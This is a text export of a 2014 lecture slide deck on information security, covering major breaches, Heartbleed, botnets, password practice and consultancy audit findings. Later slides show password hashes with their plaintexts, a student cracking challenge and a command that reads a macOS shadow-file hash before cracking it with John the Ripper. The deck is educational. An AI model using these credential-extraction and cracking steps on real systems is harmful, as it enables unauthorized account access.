How Safe is your Data?

1. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 1/33 How Safe is Your Data? TAPPS 12 May 2014 Michael Soltys McMaster University / Executek

2. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#8 2/33 Information Security Key in a knowledge-based economy; key to safety: at a personal, organizational, and national level As technology evolves, so do the threats User behavior: - choose good passwords - update software regularly - authenticate Advanced practice: - comes down to the unsolved problem of writing correct software - Big data analytics

3. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#8 3/33 Large scale attacks: U of Maryland Attacks it can affect large numbers of people In February 2014 the University of Maryland faced what it called a "sophisticated cyber-attack" which breached the records of more than 287,000 present and past students

4. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 4/33 Large scale vulnerabilities: Heartbleed Bug allows an attack to read the memory of a web server affects all versions of OpenSSL in the 1.0.1 series up to and including 1.0.1f the defect could be used to reveal up to 64 kilobytes of the application's memory CVE-2014-0160 Canadian Revenue Agency (CRA) closed down its electronic services website over Heartbleed bug security concerns OpenSSL validated under FIPS 140-2 by NIST! (FIPS = Federal Information Processing Standards; NIST = National Institute of Standards and Technology)

5. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 5/33 New types of attacks The field is not static; new attacks are clever and inventive: Drive-by downloads: where a browsing reader can accidentally download rogue computer programs. Spear phishing: where specific individuals or organisations are targeted with fake emails to obtain confidential information. Watering Hole: about one in 20 attacks uses this strategy where rather than trying to break into an organisation's network directly, this targets other websites where people might regularly visit, with the aim of infecting their computers and trying to get the unwitting carrier to bring a virus back into their own network.

6. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 6/33 A typical attack: Malicious PDFs In March 2014 a massive scam email was sent in Colombia, claiming to be from one of the country's credit score agencies The email contained an attachment file. The file does not show malicious payload when scanned by antimalware software. However, doing a "stream dump" of the file we see: Malicious scripting: which instructs the reader to execute the URL. After downloading the file shown in that URL, keylogger is downloaded.

7. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 7/33 2011: A Bad Year When the history of 2011 is written, it may well be remembered as the Year of the Hack. Stories of computer breaches were breaking almost every week: Sony Fox the British National Health Service and the Web sites of: PBS the U.S. Senate and the C.I.A. all fallen victim to highly publicized cyber-attacks. Many of the breaches have been attributed to the groups Anonymous and LulzSec.

8. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 8/33 Operation Shady Rat Operation Shady rat ranks with Operation Aurora (the attack on Google and many other companies in 2010) as among the most significant and potentially damaging acts of cyber-espionage yet made public. Operation Shady rat has been stealing valuable intellectual property (including government secrets, email archives, legal contracts, negotiation plans for business activities, and design schematics) from more than 70 public and private sector organizations in 14 countries. The list of victims, which ranges from national governments to global corporations to tiny nonprofits, demonstrates with unprecedented clarity the universal scope of cyber-espionage and the vulnerability of organizations in almost every category imaginable.

9. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 9/33 Operation Shady Rat The vast majority of victims, 49, were U.S. based companies, government agencies, and nonprofits. The category most heavily targeted was defense contractors, 13 in all. All the signs point to China. Forensic investigation revealed that the defense contractor had been hit by a species of malware that had never been seen before: a spear-phishing email containing a link to a Web page that, when clicked, automatically loaded a malicious program, a remote access tool, or rat, onto the victim's computer. The rat opened the door for a live intruder to get on the network, escalate user privileges, and begin exfiltrating data.

10. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 10/33 Victims don't want to be victims McAfee sent emails to officials at four organizations, informing them that their computer networks had been compromised. Three of those organizations-including one whose breach is ongoing-made no response to McAfee's notifications. "Victims don't want to know they're victims. I guess that's just victim psychology: if you don't know about it, it's not really happening." bit.ly/1iiKWoh(http://bit.ly/1iiKWoh) 0:00 / 3:21 CNN - Operation Shady RAT

11. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 11/33 An innocuous click RSA is the security division of the high-tech company EMC. Its products protect computer networks at the White House the Central Intelligence Agency the National Security Agency the Pentagon the Department of Homeland Security, as well as most top defense contractors, and a majority of Fortune 500 corporations.

12. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 12/33 An innocuous click Sometime in the winter of 2011, lying there in the junk-mail folder, in the spammy mess of mortgage offers and erectile-dysfunction drug ads, an email from an associate with a subject line that looked legit caught the man's eye. The subject line said "2011 Recruitment Plan." The man clicked on the message, downloaded the attached Excel spreadsheet file, and unwittingly set in motion a chain of events allowing hackers to raid the computer networks of his employer, RSA. The parent company disclosed the breach on March 17, 2011, in a filing with the Securities and Exchange Commission. The hack gravely undermined the reputation of RSA's popular SecurID security service.

13. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 13/33 An innocuous click Experts found evidence that the attack on RSA had come from China. They also linked the RSA attack to the penetration of computer networks at some of RSA's most powerful defense-contractor clients, among them: Lockheed Martin, Northrop Grumman, L-3 Communications Few details of these episodes have been made public. BIG DATA → bit.ly/1iiLc6I(http://bit.ly/1iiLc6I)

14. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 14/33 Operation Aurora in 2010 Google became the first major company to blow the whistle on Chinese hacking when it admitted to a penetration known as Operation Aurora, which also hit: Intel Morgan Stanley and several dozen other corporations Most companies have preferred not to talk about or even acknowledge violations of their computer systems, for fear of panicking shareholders and exposing themselves to lawsuits. Or for fear of offending the Chinese and jeopardizing their share of that country's exploding markets.

15. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 15/33 Operation Aurora Chinese hackers who breached Google's servers several years ago gained access to a sensitive database with years' worth of information about U.S. surveillance targets, according to current and former government officials. bit.ly/1iiLtXt(http://bit.ly/1iiLtXt) The breach appears to have been aimed at unearthing the identities of Chinese

16. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 16/33 Attempted logins

17. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 17/33 Attempted logins #!/usr/bin/perl $i=1; $test=0; $packets=0; sub compute_ip { $IP=`dig @_ +short`; if ($IP) { print "tt IP= $IP <br>"; } else { print "tt IP= ? <br> n"; } } sub compute_location { $country=`/sw/bin/geoiplookup @_`; $country =~ m/([ A-Za-z]*)$/; $country_short = $1; if ($country_short) { print "tt Country= $country_short <br>nn"; } else { print "tt Country= ? <br> nn";

18. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 18/33 Esotnia 2007 In the Spring of 2007, government computer systems in Estonia experienced a sustained cyberattack (cyber-{warfare, terror, crime}). On April 27, officials in Estonia moved a Soviet-era war memorial commemorating an unknown Russian who died fighting the Nazis. The move stirred emotions, and led to rioting by ethnic Russians, and the blockading of the Estonian Embassy in Moscow.

19. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 19/33 Estonia 2007 The event marked the beginning of a series of large and sustained Distributed Denial- Of-Service (DDOS) attacks launched against several Estonian national websites. In the early days of the cyberattack, government websites that normally receive around 1,000 visits a day reportedly were receiving 2,000 visits every second. This caused the repeated shut down of some websites. The cyberattacks against Estonia were unusual bec. the rate of the packet attack was very high, and the series of attacks lasted weeks, rather than hour or days, which is more commonly seen for a DoS attack. Eventually, NATO and the United States sent computer security experts to Estonia to help recover from the attacks, and to analyze the methods used and attempt to determine the source of the attacks. youtu.be/PTv3QrhGPC8?t=42m34s(http://youtu.be/PTv3QrhGPC8?t=42m34s)

20. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 20/33 Estonia 2007 A persistent problem during and after any cyberattack is accurate identification of the attacker: was it sponsored by a nation? was it the independent work of a few unconnected individuals? was it initiated by a group to instill frustration and fear by damaging the computerized infrastructure and economy? The uncertainty of not knowing the initiator also affects the decision about whom should ultimately become a target for retaliation, and whether the response should come from law enforcement or the military. After some investigation, network analysts later concluded that the cyberattacks targeting Estonia were not a concerted attack, but instead were the product of spontaneous anger from a loose federation of separate attackers.

21. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 21/33 Botnets Botnet = "Robot Network" Botnets are made up of vast numbers of compromised computers that have been infected with malicious code, and can be remotely-controlled through commands sent via the Internet. Hundreds or thousands of these infected computers can operate in concert to: disrupt or block Internet traffic for targeted victims harvest information distribute spam, viruses, or other malicious code.

22. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 22/33 Botnets Botmasters can reportedly make large sums of money by marketing their technical services. For example, Jeanson Ancheta, a 21-year-old hacker and member of a group called the Botmaster Underground, reportedly made more than $100,000 from different Internet Advertising companies who paid him to download specially-designed malicious adware code onto more than 400,000 vulnerable PCs he had secretly infected and taken over. He also made tens of thousands more dollars renting his 400,000-unit botnet herd to other companies that used them to send out spam, viruses, and other malicious code on the Internet. PPI: Pay-per-Install - The Commoditization of Malware Distribution In 2006, Ancheta was sentenced to five years in prison (FBI operation Bot Roast). Symantec reported that it detected 6 million bot-infected computers in the second half of 2006.

23. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 23/33 Botnets Some botnet owners reportedly rent their huge networks for US$200 to $300 an hour, and botnets are becoming the weapon of choice for fraud and extortion. Newer methods are evolving for distributing bot software that may make it even more difficult in the future for law enforcement to identify and locate the originating botmaster. Botnets organize themselves in an hierarchical manner, with a central command and control location (sometimes dynamic) for the botmaster. This central command location is useful to security professionals because it offers a possible central point of failure for the botnet. However, in the near future, attackers may use new botnet architectures that are more sophisticated, and more difficult to detect and trace, e.g., P2P.

24. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 24/33 E.g., Wordpress A fantastic piece of software for blogging; but consists of many parts: MySQL; Apache; PHP; HTML; JavaScript; Mac OS X Server absolutely essential to have the latest versions and strong password.

25. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 25/33 Passwords Your password must be a minimum of 8 characters in length and must include characters from at least three of the four groups below: Uppercase letters: A, B, C, ... ,Z Lowercase letters: a, b, c, ...,z Numerals: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 Symbols: ~ ! @ # $ % ^ & * ( ) _ + ` - = { } | ] [ : " ; < > ? , . / ' Do not use any of your last five previous passwords. Passwords cannot contain your account name or parts of your full name. Generate with a seed, a name, and an MD5 hash generator E.g., myname@gmail.com use seed 5a63y@h& to obtain: hash: ae19e19070a052b85306fc758146ef8e

26. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 26/33 Uncovered during Executek audits A client's computer we discovered that the data was kept in a Dropbox folder, and someone who was not supposed to see it had constant access to the latest version. Most clients use dictionary passwords, never change them; sometimes they write them down on sticky notes placed on the monitor. Employees who leave keep passwords, which are not changed immediatelly, etc. Software is seldom updated. The server is secured but the backup module is not.

27. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 27/33 Sophisticated attacks Control hijacking attacks: exploits and defenses Dealing with legacy code: sandboxing and isolation Exploitation techniques and fuzzing Tools for writing robust application code Principle of least privilege, access control, and operating systems security Security problems in network protocols: TCP, DNS, SMTP, and routing Unwanted traffic: denial of service attacks

28. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 28/33 Authentication

29. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 29/33 Apache Security Apache HTTP server access: .htaccess .htpasswd The first file is the policy and the second the password: AuthType Basic AuthName "Networks & Security Readings 2014" AuthUserFile cs3c03-w14/ReadingList/.htpasswd require valid-user The second file contains the username and a hash of the password; two examples: nets2014:9bn3EF/hJS5J6 netsec2013:$apr1$fr2JPfTa$HEzejdyg5DE2MFGVCIzd21

30. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 30/33 Apache Security Challenge I tell my students that the first to break the first password, obtained with the command: htpasswd -cbd ./.htpasswd nets2014 a5e1c054 gets extra marks. Note the password is not a dictionary word. Still, it takes about 15min with, for example, ochHashcat-plus software. On the other hand, breaking the second password, obtained with the command: htpasswd -cbm ./.htpasswd netsec2013 tigerblood is practically impossible (crypt vs md5).

31. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 31/33 Executek: Breaking into a Super-User account Obtained the SHA1 hash of the password from "shadow file": cat /private/ var/db/shadow/hash/[...] | cut -c 169-216 which turns out to be: [...]:4AC8F24F7CE9DBF6C81ECEAA9885401E3221147179FB9178 and then used: John the Ripper 1.7.3.1 software to reverse engineer the password: onegod it took about 20 minutes because the password was a dictionary word!

32. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 32/33 References CRS Report for Congress 2008(http://www.fas.org/sgp/crs/terror/RL32114.pdf) Vanity Fair: Operation Shady Rat 2011(http://rdd.me/5sihotjz) Vanity Fair: Enter the Cyber-Dragon 2011(http://rdd.me/todxjx9k) Malicious PDF (ISC)(https://isc.sans.edu/forums/diary/17875) Networks Course Password Cracking Challenge(http://bit.ly/1paMuDy)

33. 5/12/2014 How Safe is Your Data? http://127.0.0.1:3999/security-may2014.slide#1 33/33 Thank you Michael Soltys McMaster University / Executek soltys@mcmaster.ca(mailto:soltys@mcmaster.ca) http://www.cas.mcmaster.ca/~soltys(http://www.cas.mcmaster.ca/~soltys) @MichaelMSoltys(http://twitter.com/MichaelMSoltys)

How Safe is your Data?

How Safe is your Data?

Recommended

More Related Content

What's hot

What's hot(20)

Viewers also liked

Viewers also liked(20)

Similar to How Safe is your Data?

Similar to How Safe is your Data?(20)

Recently uploaded

Recently uploaded(20)

How Safe is your Data?